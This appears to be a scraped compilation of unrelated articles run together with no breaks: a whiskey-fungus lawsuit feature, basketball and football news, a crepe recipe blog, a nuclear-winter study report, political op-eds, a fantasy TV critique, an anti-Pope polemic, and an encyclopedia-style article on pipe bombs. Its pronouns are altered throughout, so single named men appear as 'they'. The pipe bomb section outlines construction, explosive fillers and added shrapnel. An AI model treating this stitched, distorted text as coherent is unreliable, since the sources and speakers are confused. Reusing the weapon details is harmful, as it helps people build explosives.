Shortly after Billy and their attorney filed suit in Louisville, Michael Mills of nearby Frankfort called McMurry with the same problem. Mills is now one of three lead plaintiffs in a suit against Jim Beam and Buffalo Trace in Frankfort. A retired biologist who studied pollution in the Ohio River for the state of Kentucky, Mills knows a thing or two about corporate negligence. "I used to advise people against fishing in the Ohio River because of the water pollution," they say. "Now I'm dealing with pollution in the air." They point out where the fungus has pitted and embedded itself into their aluminum siding.
What the town of Shively and Mills' area of Frankfort have in common is that they are both within a mile radius of distillery warehouses, where at any given moment millions of gallons of whiskey are aging.
Michael Mills, another plaintiff in the case.
This aging process is what gives it those distinctive charred oak and caramel flavors that we love, but it's also what causes whiskey fungus. When it's aging—expanding and contracting in and out of the barrels' oak panels—a significant portion of the alcohol evaporates into the air, about two percent every year. In Kentucky alone, that amounts to five million gallons' worth of evaporated bourbon per year. (That doesn't count all the evaporated whiskey in Tennessee, Scotland, and Japan—which is a lot.) In the magical language that distillers use to talk about their products, this alcohol vapor is called the "angel's share," because it legendarily floats up to alcoholic angels in the sky.
Where the evaporated alcohol actually goes, though, is another story—a more scientific one that explains why neighborhoods like Shively have had to deal with this black fungus for so many years. Since ethanol is denser than air, the evaporated angel's share doesn't float up into the sky at all, but rather down into surrounding communities. It is the people's share. When this airborne ethanol meets the slightest bit of moisture—which is common because distilleries and towns are usually near water sources—you get whiskey fungus all over the place.
The fungus covers many of the street signs in the area.
The whiskey fungus requires frequent cleaning and causes damage to the physical property (almost every resident we spoke to has replaced their aluminum siding at some point in time), but the major damage has been to people's property values. Even if people keep their houses impeccably clean, they are required by law to inform prospective home-buyers about the Baudoinia blight. Who would want to buy a house with hard-to-remove fungus growing all over it?
The extent of this property damage is impressive. If you multiply the average reduction in property value by the number of households affected, you can easily get to a figure in the hundreds of millions of dollars. Let's say someone claims that their $200,000 home has lost a quarter of its value, or $50,000 worth. Paying that one person is not a big deal for a big whiskey company. But in a class-action suit, where thousands of people can claim similar damages, that dollar figure can quickly escalate. If 5,000 people claimed $50,000 in damages—which isn't a crazy number considering all the people who could be affected—the whiskey companies would hypothetically owe $250 million. That's Erin Brockovich dough.
The Buffalo Trace distillery in Frankfort.
The whiskey companies deny that their ethanol emissions are causing whiskey fungus, having previously claimed that it is "a naturally occurring common mold that is found widely throughout the environment, including in areas unrelated to the production of whiskey." (Calls to each of the companies—except for Buffalo Trace, which did not wish to comment—went unreturned.) But their main argument, which so far one judge has agreed with and one has not, is that federal law should preempt state law, and that federal law allows them to release ethanol into the air. Ironically, this federal law is called the Clean Air Act, and it has a clause in it allowing whiskey companies to release so-called "fugitive emissions" into the air, as long as retaining those emissions would hurt the flavor of the whiskey.
The plaintiffs' counter-argument is two-fold: 1) that there's a clause in the Clean Air Act inviting nuisance suits from people negatively affected by these emissions, and 2) that retaining the ethanol would not actually affect the flavor of the whiskey. If the courts side with the plaintiffs on this federal preemption argument, the debate will then turn to the whiskey distillers' negligence: do ethanol emissions cause whiskey fungus, do the distillers know that these emissions cause whiskey fungus, and should they be responsible for damages?
Inside the barrel warehouse.
Whiskey distillers could ameliorate the situation and stop more whiskey fungus from growing, but it'll take a lot of money—about $400,000 per warehouse, to be exact. For that price, they can install thermal oxidizers in all of their warehouses, as brandy distillers currently do in California. These machines decompose ethanol vapor into smaller compounds like water and carbon dioxide that won't feed the whiskey fungus. In court, the whiskey distillers claim that this process will affect the taste of the whiskey, but brandy makers like E & J Gallo have publicly disagreed.
What the two sides are not debating, though, is whether the fungus (or the airborne ethanol) is harmful to human health.Though it's a black-colored mold, Baudoinia isn't as bad for us as Stachybotrys, commonly known as toxic black mold. "Genetically speaking, Baudoinia is as similar to black mold as we are to chickens," Dr. Scott stresses. Given the species of fungus, they don't think it's especially harmful to humans, but they can't say for certain until it's been researched further.
The side of the warehouse that gets the least amount of sun is covered in the fungus, as are all of the trees in the area.
Another concern, which makes McMurry's face turn an angry shade of red, is the possibility that evaporated ethanol is converting into ethanal, AKA acetyldehyde, which is considered a known carcinogen by the International Agency for Research on Cancer. There's a chance people are breathing in acetyldehyde without knowing it.
One reason why this is worth studying now is the rising popularity of whiskey. Worldwide demand for whiskey is increasing rapidly, bourbon in particular. According to the Associated Press, the number of licensed distilling companies in Kentucky has more than tripled since 2012, going from 10 to 31. The number of employees has almost doubled over the same time, going from 8,690 to 15,400. That means more whiskey will be made, more warehouses will be built to age it, and more whiskey fungus will crop up in more neighborhoods.
Fungus in Frankfort.
Unless Baudoinia turns out to be an amazing alternative source of fuel or the next superfood, this is a bad thing. More whiskey fungus will cause more property damage—most likely in the areas where people can least afford it.
"That turned into a headline that said: 'Bogut wants out,' which is false. But obviously if they can get some picks back and build for the future by trading a few of their veteran guys, I could be one of them. "Now, emphasis on 'could.' I'm not saying I've gone in and asked for a trade, which I haven't. But I also haven't gone to management and begged them not to trade me. I'm just waiting to see what happens. There are some personal reasons for why I'd like to stay here, which people don't know." Bogut sparked this conversation after they did a radio interview in Australia. That interview turned into a headline in their homeland. They have value around the NBA for teams that are contenders - either for the title or to make the playoffs - because they are in the final year of their contract. They could be a nice 40-game rental for some team without tying up future salary-cap space. That's also why he's valuable in Dallas, but if the Mavericks could get a first-round pick or more for Bogut, they certainly would have to consider it, unless they reverse fortunes and feel they have a legitimate shot to make the playoffs.
It makes for interesting speculation going into the six weeks before the February 23 trade deadline. Asked if they could see any scenario in which he's a Maverick next season, Bogut said: "No. If you're asking me today and I had to put my house on it, I'd say no just because if there was an opportunity for me to come back, there would have been at least extension talks, which I'm not bitter about. "I'm not mad about. That's just the reality of it. It's the writing on the wall. "The Mavs eventually have to start rebuilding. There's no point bringing back a 33-year-old centre if you're in rebuild mode. It's been a disappointing year for everybody, myself included. But it's one of those things. "I very much highly doubt I'll be back here next season just because I'm an expiring contract and I'm a free agent. I just don't see it."
Bogut did not want to discuss the personal reasons why they would like to stay with the Mavericks. They also said that a buyout of the remainder of their $US11 million ($15 million) salary this season is not likely. But a trade remains a distinct possibility. "I have not asked to be traded," Bogut said. "Do I want to be traded? If there's an opportunity to go somewhere and they want to do it, I'm not going to beg them to not trade me. But I have not gone to the office and asked for a trade. It's been a tough season for everybody, but it's far from the truth that I've gone to management and asked for a trade." The Mavericks have had internal discussions about bringing Bogut back at a sensible price tag next season. But the franchise philosophy is to address those situations in the offseason. Rick Carlisle said they could easily envision Bogut as a Maverick next season.
"He's one of our best players, one of our most productive players," Carlisle said. "My conversations with Donnie about it, we've talked about re-signing them as a real possibility. I'm not sure about any of that kind of stuff. But I know the kind of impact they have on our team. "I don't know what's going to happen. But it's a dynamic business. I'm not certain what's going to happen. But I've had some good talks with them recently. And I know they like it here. "And my understanding is that they did not want to be traded. But we're all big boys and we've all been in this a long time. Part of the business is trades do happen. But I don't know anything about any trades." McClatchy Newspapers
Before I start this post, I first want to apologize for the long delay between posts. I have been very busy the last couple weeks as I have been working at Churchill Downs during the recent Kentucky Derby. It was a lot of work but also a lot of fun (as you can see here: The 140th Running of the Kentucky Oaks and the Kentucky Derby). I am glad to have some free time back to do some cooking and blogging though.
As the winner of the mystery box challenge, Adrien was able to choose between three of Joe's favorite ingredients: Octopus, Veal and Mushrooms. They chose octopus for himself. Then, Christian was able to select their and Jennifer's ingredient. Christian selected veal for themselves and gave Jennifer mushrooms to work with.
Each contestant had positives and negatives to their final dishes, but the judges decided to send Adrien (Pan Seared Octopus) and Jennifer (Mushroom and Egg Ravioli) to the Final Challenge. This eliminated Christian (Veal) from the competition.
When I started this blog, I wrote a rule to direct me in what ingredient to cook with in challenges such as this. It read:
“For challenges in which the competitors are given different ingredients to work with, I will use the ingredient that the most chefs are given to cook with. If every contestant is given a different ingredient, I will use the one the winner picks for him/herself, or if the winner does not cook in the challenge, the ingredient that is given to that episode's ‘target'.”
However, for this challenge, if I were to follow this rule, I would have to cook with octopus. While I would love to tackle the challenge, I know that I am just not going to be able to find octopus to work with. So to try and follow the rule at least a little bit, I will cook with the ingredient given to the challenge's “target.” That ended up being Jennifer, who was stuck with mushrooms.
I knew I wanted to try something a little different and crepes have been on my list of “dishes to attempt.” I was lucky enough to find this recipe that met both criteria: Mushroom Crepes with Poblano Chile Sauce. Since most of this was new to me, I mostly stuck to the recipe with the one exception being my addition of chicken. This was going to be my dinner, after all, and I wanted protein! However, this dish would be just a delicious as the original vegetarian option. I also halved the recipe to make only 8 crepes, which brought down the expected cook and prep time of 4 hours to just under 3 hours.
The first thing I did was make the crepe batter. I blended 1 cup of whole milk, 1.5 eggs (I guesstimated this – I know its a weird amount but that's what happens when you only do half of a recipe), 1 tablespoon of melted butter (that had been cooled), and 1/2 of a teaspoon of fine sea salt in a blender for 5 seconds. I then added 1 cup of flour, 1/2 cup at a time, blending the batter until it was smooth after each addition. I let this rest for 1 hour and then re-blended for 5 seconds just before using.
While the batter was resting, I started to prep some of the other components. First, I charred 3 poblano chiles in the broiler until they were blackened on all sides. I then enclosed them in paper bag for 10 minutes. Finally, I peeled, seeded, and thinly sliced the chiles. For this part of the recipe, I used this tutorial as a guide: How to Roast and Peel Poblano Peppers.
Next, I prepped the other ingredients: diced white onions, minced garlic, minced cilantro, sweet corn sliced off the cob, and shredded chicken (I cheated and just got the pre-cooked rotisserie chicken from the grocery store). All of these were fairly simple but I decided to use this post as an excuse to try this: The Magic Corn Trick. While it worked really well for cooking the corn, the cob didn't exactly slide out without any silk. Maybe I needed to cook it longer or maybe I needed to trim it more. Either way, there was something there that didn't quite work but I'll definitely try it again sometime.
After all the prep work was done, I moved on to the crepe making. I heated a medium nonstick skillet over medium heat. I brushed the bottom of the pan with melted butter. Then, I poured 3 tablespoons of batter into the skillet and swirled until the bottom of the skillet was coated evenly. I let this cook until the bottom of crepe was golden. (The recipe said that this should take about 30 seconds but it took much longer than that). Then, I loosened the edges gently with a spatula and turned the crepe over. I cooked this until the bottom was brown in spots, and turned the crepe out onto a paper towel.
The first crepe I made was a disaster. It wasn't really cooking all that well and I turned it too early so it looked completely screwed up (as seen below).
But I turned the heat up and got the hang of the cooking process on the second one and it only got better from there. I repeated the cooking process for each, making about 8 crepes (plus the one wonky crepe) and stacked them between paper towels.
Next, I moved on to the poblano cream sauce. I melted butter in a medium saucepan over medium heat. I then added 2-3 tablespoons of diced white onion and 1 clove of minced garlic, and sautéed for about 2 minutes. Next, I stirred in 1 and 1/2 tablespoons of flour and sautéed for 1 minute longer. I then whisked in 1 cup of warm whole milk and brought the whole mixture to a boil (while whisking constantly). I reduced the heat to medium-low and let the sauce simmer until it thickened, about 5 minutes.
Then, I poured the sauce into a blender with 1/4 cup of heavy whipping cream, half of the roasted poblano chiles, and salt and pepper to taste, and blended the sauce until it was smooth.
After completing the sauce, I moved on to the filling. I heated a few tablespoons of olive oil in a large skillet over medium-high heat. I then added 1 cup of diced white onions, 8 ounces of sliced shitake mushrooms, 3-4 cloves of minced garlic, and half of the reserved poblano chiles (chopped). I sautéed this until the mushrooms were brown and the mushroom liquid had evaporated, about 10 minutes. Then, I added the shredded chicken, 1 tablespoon of minced fresh cilantro and salt and pepper to taste. I let that mixture cook together until the chicken was warmed through.
With most of the components finished, I then started to fill the crepes. I spooned some of the filling in the middle of the crepe, wrapped it and placed it in a baking dish. I drizzled about half of the poblano cream sauce over the top of the crepes, and then sprinkled 1/2 of a cup of grated manchego cheese over top. I put this dish in a 350-degree oven until the cheese melted, about 12 minutes.
While the stuffed crepes were in the oven, I worked on the final component: the garnish. In a large skillet, I sautéed some sweet corn with the rest of the poblanos (chopped) in some olive oil with salt and pepper until they were heated through. I also prepped some cilantro and fresh lime as a garnish.
When the crepes came out of the oven, I spooned some additional poblano cream sauce onto the serving dish. Then, I placed 2 stuffed crepes over the sauce and garnished the dish with fresh cilantro, the corn-poblano mixture and a squirt of fresh lime over the top.
Overall, this dish was delightful. It was very unique and would have definitely caught the attention of the judges. While the crepes took a great deal of time (and probably should have been a bit thinner), the rest of the components were fairly simple. In the future, I might use pre-made crepes or flour tortillas instead in order to cut out a lot of the prep work. The flavor profile also didn't feature mushrooms as prominently as the challenge called for, but I'm sure there's a way to tweak this dish to do so. Regardless, this is a delicious dish that should definitely be tried.
I am certainly happy to be back to blogging. Here's to hoping there won't be too many delays like this in the future.
A group of scientists and students at the University of Colorado Boulder are working to calculate the environmental and human impact of a potential nuclear war.
Professor Brian Toon of CU Boulder's Laboratory for Atmospheric and Space Physics, and Rutgers professor Alan Robock have been studying the threat in-depth for decades, but are launching a new study to calculate in detail for the first time the impacts of nuclear war on agriculture, the oceanic food chain and on humans.
They use weather maps and study patterns of fires started by nuclear detonations.
"One of our goals for this study is to inform people how dangerous these weapons are by providing a solid scientific analysis of the issues," Toon said.
They and Robock say the big problem with nuclear war is a term you've probably heard, "nuclear winter," which would affect the world's supply of food.
"These weapons start massive fires in cities and huge amounts of smoke are carried into the upper atmosphere, which spreads around the Earth - blocking the sun and throwing the world into sub-ice age temperatures, which means basically, you can't grow anything for several years," Toon said.
Toon's team uses climate models developed by the National Center for Atmospheric Research in Boulder to calculate fire fuels around the world and agricultural and world trade food models.
They are also calculating how much smoke might be produced by nuclear blasts.
The new project is funded by a three-year, $3 million grant from the Open Philanthropy Project headquartered in San Francisco.
Copyright 2017 KUSA
The party must choose a direction. There is a persuasive argument that it should move further left, particularly on economic issues: Bernie Sanders trounced Hillary Clinton among young voters. Even though Clinton ran on the party's most progressive platform in decades, their reputation was hurt above all by the sense that they came from the corporate wing of the Democratic Party—that they were perpetuating what anti-establishment voters on both the left and right felt was a rigged system. This was not a baseless assumption, either. But the Democratic establishment disagrees with that assessment, and has pushed back hard since Trump's election.
Third Way, a centrist Democratic think tank with deep ties to Wall Street, just announced that it has received $20 million to “to conduct extensive research, reporting and polling in Rust Belt states that once formed a Blue Wall.” Its president, Jonathan Cowan, told Politico they don't think populism will save their flailing party. “You can't meet right-wing populism effectively as a matter of politics or governing with big government liberal populism, or 1990s centrism. You have to do something entirely new for a new era.” The implication here is that centrism is still more palatable to voters than the progressivism of politicians like Bernie Sanders or Rep. Keith Ellison or even Elizabeth Warren.
If the Democratic Party wants to flourish, it must adapt to its changing electorate and it cannot do this if it will not listen to new voices.
In The Guardian, Al From, the former head of the Democratic Leadership Council, urged Democrats to cling ever tighter to that sweet, sweet centrism. “Democrats should rededicate ourselves to the core New Democrat principles—opportunity, responsibility, community—the first principles of the Democratic Party,” they wrote. Redistribution? Don't even think about it, they finger-wagged: “Economic growth can only be generated by a robust private sector.” Of course, we do have a robust private sector. As it recovered from the recession, the number of children living in poverty grew.
Another pro-Clinton centrist, David Brock, is already courting the donors they need to sustain their organizations. Former Clinton aides are helming the party's anti-Trump war room. Keith Ellison's bid for party chair is reportedly unpopular with some moderate Democrats. Their challenger, outgoing Labor Secretary Tom Perez, advertises themselves as a “progressive who can get things done.” That's a sharp dig at Ellison, who backed Sanders's White House run.
This is a debate Democrats need to have. The problem is that the same camp that is championing establishment ideology is also claiming that any attacks on that ideology are a blow to Democratic unity. If the Democratic Party wants to flourish, it must adapt to its changing electorate and it cannot do this if it will not listen to new voices. It's not enough for Democrats to call themselves The Resistance. They must also explain what it is they're resisting. Is it simply Trump? Or is it the ideology that helped put Trump in power?
Here, Democrats should take a lesson from the left. “Movements can mobilize people to refuse, to disobey, in effect to strike,” Frances Fox Piven recently wrote in The Nation. “[P]eople in motion, in movements, can throw sand in the gears of the institutions that depend on their cooperation.” Fight for 15, Occupy, Black Lives Matter: They point the way forward. So, too, did last Saturday's Women's March. In each instance, people rallied around a cause, not a person or a party. They did not turn out for politicians, they were not attracted by celebrities. They turned out because they wished to identify themselves with a specific values statement. Their actions teach us what it means to do politics—and warn us against defining politics in electoral terms alone.
The Democratic Party will continue to fail unless it understands this. The victims of its failure won't be Hillary Clinton or David Brock but vulnerable Americans whose survival depends on the party's ability to oppose Trumpism. Its left-wing critics have no choice but to reject its calls for unity. The stakes are too high to do anything else.
Editor's note: A previous version of this article stated that Cory Booker supported raising the minimum wage to $10.10. They have co-sponsored legislation that would raise it to $12. We regret the error.
HARRY Kewell's year-long spell without a club is finally over after the 34-year-old signed a short-term deal with Qatari club Al Gharafa.
The Former Leeds and Liverpool star had been without a club since leaving Melbourne Victory at the end of last year's A-League season for family reasons.
Al Gharafa, who announced the deal on their website, said Kewell had only been recruited until the end of the current Qatar Stars League season which ends in May.
Kewell has already joined their new teammates in a training session and is preparing to make their debut for Al Gharafa's match with Al Sadd on Saturday.
They join fellow Socceroo Mark Bresciano at Al-Gharafa, but the two won't play together in the remaining three games of the league season with Bresciano to miss at least another month with a knee injury.
Bresciano could be back for part of the their Asian Champions League campaign.
Al Gharafa are currently second in their group after three matches and are well-placed to advance to the knockout stages.
A-League: Melbourne Victory score dramatic win over Perth Glory
Kewell's former Liverpool teammate Djibril Cisse is currently on-loan with Al Gharafa from Queens Park Rangers, while Brazilian pair Alex and Nene, who starred with Spartak Moscow and Paris Saint-Germain respectively, are also on the books.
Kewell had been hopeful of finding a club in England over the past year to stay close to their family home in Cheshire.
Many expected them to return to the A-League after being linked to a move to the Newcastle Jets while Perth Glory were also reportedly interested in bringing them back.
The Al Gharafa deal could revive hopes of Kewell re-joining the Socceroos while they remain unlikely to feature in June's crucial World Cup qualifiers against Japan, Jordan and Iraq.
Originally published as Kewell signs with Qatari club
For months now, I've been counting the days to April 17th, the release date of HBO's Game of Thrones. As a longtime fan of the books I have high hopes for the TV series as delicious entertainment, which is the chief characteristic of George R. R. Martin's books at their best. I don't expect it to offer social commentary like The Wire or philosophical depth like Six Feet Under (my favorite shows), because that is not what the books contain. What I hope is that like the books, the show will feature compelling characters, suspenseful plotting and colorful set pieces bringing Martin's vividly imagined world to life.
I was surprised to read Ginia Bellafante's piece in the New York Times, as it manages to do so many wrong things at once. The piece is rife with inaccuracies that could have been avoided by a cursory skimming of the book (or even back cover copy), is openly, even proudly contemptuous of the entire fantasy genre, and -- perhaps worst of all -- is patronizing to women readers.
It's clear that Bellafante was probably the wrong audience for this particular show, but they did not do their due diligence as a critic. If they had, they would have refrained from making remarks such as:
Given the bizarre climate of the landmass at the center of the bloody disputes -- and the series rejects no opportunity to showcase a beheading or to offer a slashed throat close-up -- you have to wonder what all the fuss is about. We are not talking about Palm Beach.
The series was inspired by the Wars of the Roses in medieval England, which is not a secret (and was mentioned in Laura Miller's recent profile of Martin in the New Yorker), so no, it isn't Palm Beach. People vied for the throne in England even though there was nasty weather. Go figure, but that's history.
The fictitious land of the Seven Kingdoms is not, as per Bellafante, "a universe of dwarfs." The one dwarf, Tyrion Lannister, is genetically disposed to be one -- they are not of a race of dwarfs. This really ought to have been clear, since -- as often happens in our world -- Tyrion's entire family is of average height.
But perhaps the oddest and most noteworthy inaccuracy is the following:
Game of Thrones is a costume-drama sexual hopscotch... The true perversion, though, is the sense you get that all of this illicitness has been tossed in as a little something for the ladies, out of a justifiable fear, perhaps, that no woman alive would watch otherwise.
Where to begin. I will be surprised if HBO bothered to invent sex scenes for this show, because the books already have lots and lots of sex. If the showrunners have executed a faithful adaptation from page to screen, "illicitness" will run rampant.
But more remarkably, Bellafante is here positing that only men are interested in fantasy.
And they elaborate on this theme:
While I do not doubt that there are women in the world who read books like Mr. Martin's, I can honestly say that I have never met a single woman who has stood up in indignation at their book club and refused to read the latest from Lorrie Moore unless everyone agreed to The Hobbit first. Game of Thrones is boy fiction patronizingly turned out to reach the population's other half.
The characterization of fantasy as "boy fiction" is offensive to the genre and offensive to women. That we for the most part will only read what Oprah has picked, and especially if a woman wrote it, is a stereotype that is not only demeaning to women -- it is also untrue. Like Bellafante, I can offer personal anecdotes to back up my assertion, some of which involve stunning young women dressing up as Martin's characters at Worldcon. Sometimes in very tight spandex. But that would be beside the point.
When we categorize books as "boy fiction" and "girl fiction" it's just another way to promote gender stereotyping. It is predicated on the assumption that people will only read books that reflect their personal experiences, so therefore women will only deign to read about dating, shopping, and kitchen intrigues. This is patronizing to women and undermines one of the core purposes of literature, which is to take us on voyages beyond the scope of our personal experience so that we expand in our understanding and capacity for empathy. And I think most women get this; I think most women are willing to read novels with male protagonists in worlds apart from their own. To imply otherwise is an offense to the gender.
There is room for a discussion of Martin's books, and the genre as a whole, from a feminist perspective. But that is very different from dismissing the genre outright as "boy fiction" -- a dismissal that exhibits as much maturity as a children's clubhouse bearing the sign "No Girls Allowed." Now in 2011, can we grow beyond that, please?
A good fantasy novel is always about human beings. By and large, the people who love the works of George R. R. Martin do so because the characters are intriguing and the plots engrossing. A fantasy novel that falls short of these requirements does not succeed -- and that is true of every genre. And while Martin offers readers a rollicking good time above all else, other fantasy writers such as J.R.R. Tolkien, Guy Gavriel Kay and Ursula K. LeGuin use fantasy as a tool to explore themes, in books that are as profound as the most revered works of literary fiction. Both the purely entertaining and literary forms of fantasy have an appeal that is not specific to either gender.
As an advocate of free trade, I feel slightly vindicated by reports that the Obama campaign quietly assured the Canadian government that the Senator's strident words about NAFTA in last week's debate were merely political rhetoric. We've long been saying that opposition to trade is mostly an artifice of politics. But the story begs the question: Is Obama (a) economically illiterate; (b) dishonest, or; (c) naïve. The answer is (d), all of the above.
Obama blames faulty trade agreements, like NAFTA, for the loss of 3 million manufacturing jobs since 2000. But one can check that claim easily by turning to page 280 (Table B-46) of the Economic Report of the President, 2008 [.pdf]. There one will find that in the 14 years since NAFTA took effect, the number of U.S. manufacturing jobs declined by 2.7 million. In the 14 years prior to NAFTA (between 1979 and 1993) the number of manufacturing jobs declined by 2.7 million. No difference at all. In both periods, there was a decline of 193,000 net manufacturing jobs per year.
Although U.S. manufacturing employment peaked in 1979 and has been trending downward since, there was an uptick in employment in the first few years after NAFTA took effect. Between 1993 and 1998, 500,000 net jobs were created in manufacturing. Did NAFTA create those jobs? I wouldn't make that claim, but it certainly has more empirical support than the opposite claim—that NAFTA cost jobs.
Three million jobs lost since 2000? Look again [.pdf]. During the pronounced manufacturing recession of 2000-2003, there was a precipitous drop of 2.8 million manufacturing jobs, but it's hard to blame NAFTA for that. Manufactured imports from NAFTA countries were flat during that period: imports in 2000 were higher than the average for 2001 through 2003. Again, if you must blame NAFTA, look to the export side of the equation. U.S. exports dropped 11 percent from 2000 to 2003.
And for the record, since 2004, there has been a decline of 300,000 manufacturing jobs nationwide. That rate of 100,000 per year (vs. the rate of 193,000 per year during the entire post-peak period of 1979-2007) suggests that even the basis for the political rhetoric is about five years too stale.
That Obama asserted they would take a “sledgehammer” to NAFTA because it is broken and then say just kidding to the Canadians is dishonest. Some are cynical enough to excuse that as par-for-the-course pandering, but I don't. The reason that there is a backlash against trade – that there is even a debate – in this country is that lies like those are uttered with such frequency that they are believed. Those myths are all the more reinforced when spoken by someone as apparently likeable and charismatic as Senator Obama.
Finally, the attempt to smooth things over with the Canadian government raises questions about the candidate's naïvete. Did it not occur to them that a conservative Canadian government might favor a McCain presidency and might make political hay out of the “disregard-the-NAFTA-belligerence” comments?
At least Senator Clinton knows enough to wait until after Ohioans vote before winking at our NAFTA neighbors.
Save us, O Lord, save us all. Save us from the Pope. Joseph Ratzinger is coming to Britain. Gordon Brown is "delighted". David Cameron is "delighted". I am "repelled". Let them come; I applaud freedom of speech. But no red carpets, please. No biscuits. No Queen.
In their actions on child abuse and Aids, Joseph Ratzinger has colluded in the protection of paedophiles and the deaths of millions of Africans. As Prefect of the Congregation for the Doctrine of the Faith (Pope John Paul II's chief enforcer), it was Ratzinger's job to investigate the child abuse scandal that plagued the Catholic church for decades. And how did they do it? In May 2001 they wrote a confidential letter to Catholic bishops, ordering them not to notify the police – or anyone else – about the allegations, on pain of excommunication. They referred to a previous (confidential) Vatican document that ordered that investigations should be handled "in the most secretive way . . . restrained by a perpetual silence". Excommunication is a joke to me, perhaps to you, but to a Catholic it means exclusion and perhaps hellfire – for trying to protect a child. Well, God is love.
They also waved aside calls to discipline Marcial Maciel Degollado, the Mexican founder of the global Legion of Christ movement. Allegations of child abuse have stalked Maciel since the 1970s. Their victims petitioned Ratzinger, only for their secretary to inform them the matter was closed. "One can't put on trial such a close friend of the Pope as Marcial Maciel," Ratzinger said. Two abuse victims sued them personally for obstruction of justice, but they claimed diplomatic immunity.
Eventually, when the allegations could no longer be denied, Ratzinger apologised, and sent Maciel off "to a life of prayer and penitence". Why not prison? They didn't say. "It is a great suffering for the church . . . and for me personally," was Ratzinger's comment about the wider child abuse scandal. Great suffering? I thought to be raped as a child was great suffering. To be exposed as complicit in a cover-up is surely merely . . . embarrassing?
Ratzinger added that they believed the Catholic church had been the victim of a "planned" media campaign. By whom? By gays? By Jews? By Jedi? They instructed that prayers be said in perpetuity for the victims – thanks, I feel better now! – along with a push to ensure that men "with deep-seated homosexual tendencies" do not enter the priesthood, thereby turning all responsibility for the scandal into – the laps of the evil gays!
Ratzinger is also active in the suppression of Liberation Theology, a Latin American movement that insists that social justice is the central purpose of Christianity; that good Catholics should also be political activists who fight for the rights of the slum-living poor. Ratzinger was repelled, and dismissed it as "a fundamental threat to the faith of the Church".
And so to the church's own holocaust – in Africa. Condoms can protect Africans from Aids. But who can protect them from Ratzinger? The Catholic church has long pursued a no-condoms policy. In El Salvador the church got a law passed, ensuring that condoms were only sold with a warning stating they did not protect the user from Aids. In Kenya, Cardinal Maurice Otunga staged public burnings of condoms. The former Archbishop of Nairobi, Raphael Ndingi Mwana a'Nzeki told their flock that condoms, far from protecting them, contribute to the spread of the disease. Well, God is love.
Some local priests in Africa counsel contraception, because they care about their parishioners. But the Vatican, on its Roman cloud, disagrees. Aids, Ratzinger says, "cannot be overcome through the distribution of condoms, which even aggravates the problems". That is a lie. Not a fantasy, like the virgin birth and all the other magical, mystical nonsense, but a dangerous lie. There are, Your Holiness, more than 12 million Aids orphans in Africa. Twenty-two million Africans have Aids and the UN fears that eventually 90 million could die.
Ratzinger presides over a church that calls homosexuality "a deviation, an irregularity, a wound". Catholic reformers have tried to liberalise this view but Ratzinger slapped them down. In a 1986 letter, they complained that, "Even within the Church, [people] are bringing enormous pressure to bear . . . to accept the homosexual condition as though it were not disordered." They added that homosexuality is "an intrinsic moral evil".
Care to know the suicide statistics for teenage gays, Your Holiness? They are four times more likely to attempt suicide than their heterosexual fellows. In 1998, a 39-year-old gay man called Alfredo Ormando set fire to themselves in St Peter's Square, in protest at your policies. They died.
Ratzinger is no better on women; they oppose women priests, of course, and demands the criminilisation of abortion even for women who have been raped or are very sick; gin and wire coathangers, anyone? Their friend, the theologian Wolfhart Pannenberg, has said that Ratzinger sees the push for female priests as driven by "spokespersons for radical feminists, especially lesbians".
So this is the man who is coming to lecture us about morality. Welcome, Benedict XVI, Episcopus Romae, Vicar of Jesus Christ, Successor of the Prince of the Apostles, Supreme Pontiff of the Universal Church, Sovereign of the State of the Vatican City, Servant of the Servants of God. Don't tread on the corpses.
For the website, see Thepipebomb.com
A tripwire-triggered pipe bomb mock-up used to train US military service personnel
A pipe bomb is an improvised explosive device, which uses a tightly sealed section of pipe filled with an explosive material. The containment provided by the pipe means that simple low explosives can be used to produce a relatively large explosion due to the containment causing increased pressure, and the fragmentation of the pipe itself creates potentially lethal shrapnel.
Premature detonation is a hazard of attempting to construct any homemade bomb, and the materials and methods used with pipe bombs make unintentional detonation incidents common, usually resulting in serious injury or death to the assembler.
In many countries the manufacture or possession of a pipe bomb is a serious crime, regardless of its intended use.
Design [ edit ]
Different pipe bombs' appearances, from a bomb awareness report issued by the US Department of State
The bomb is usually a short section of steel water pipe containing the explosive mixture and closed at both ends with steel or brass caps. A fuse is inserted into the pipe with a lead running out through a hole in the side or capped end of the pipe. The fuse can be electric, with wires leading to a timer and battery, or can be a common fuse. All of the components are easily obtainable.
Generally, high explosives such as TNT are not used, because these and the detonators that they require are difficult for non-legitimate users to obtain. Such explosives also do not require the containment of a pipe bomb.
Instead, any sort of explosive mixture the builder can find or make is used. Some of the explosive mixtures used, such as gunpowder, match heads, or chlorate mixtures, are very prone to ignition by the friction and static electricity generated when packing the material inside the tube or attaching the end caps, causing many injuries or deaths amongst builders.[1] Sharp objects such as nails or broken glass are sometimes added to the outer shell, or inside of, the bomb to increase harm and damage.
Operation [ edit ]
Pipe bombs concentrate pressure and release it suddenly, through the failure of the outer casing. Plastic materials can be used, but metals typically have a much higher bursting strength and so will produce more concussive force. For example, common schedule 40 1-inch (25 mm) wrought steel pipe has a typical working pressure of 1,010 psi (7.0 MPa), and bursting pressure of 8,090 psi (55.8 MPa),[2] though the pipe sealing method can significantly reduce the burst pressure.
The pipe can rupture in different ways, depending on the rate of pressure rise and the ductility of the casing material.
If the pressure rise is slow, the metal can deform until the walls become thin and a hole is formed, causing a loud report from the gas release, but no shrapnel.
A rapid rate of pressure rise will cause the metal to act as a crystal and shatter into fragments, which are pushed outward in all directions by the expanding gases.
Modes of failure [ edit ]
Pipe bombs can fail to explode if the gas pressure buildup is too slow, resulting in bleed-out through the detonator ignition hole. Insufficiently tight threading can also bleed gas pressure through the threads faster than the chemical reaction pressure can rise.
They can also fail if the pipe is fully sealed and the chemical reaction triggered, but the total pressure buildup from the chemicals is insufficient to exceed the casing strength; such a bomb is a dud, but still potentially dangerous if handled, since an external shock could trigger rupture of the statically pressurized casing.
Minimum evacuation distances [ edit ]
If any type of bomb is suspected, typical recommendations are to keep all people at a minimum evacuation distance until authorized bomb disposal personnel arrive. For a pipe bomb, the US Department of Homeland Security recommends a minimum of 21 m (69 ft), and preferred distance of 366 m (1,201 ft).[3]
Uses [ edit ]
Pipe bombs are by nature improvised weapons and typically used by those without access to military devices such as grenades. They were successfully used in the Spanish Civil War (1936–1939). During World War II, members of the British Home Guard were trained to make and use them.[4]
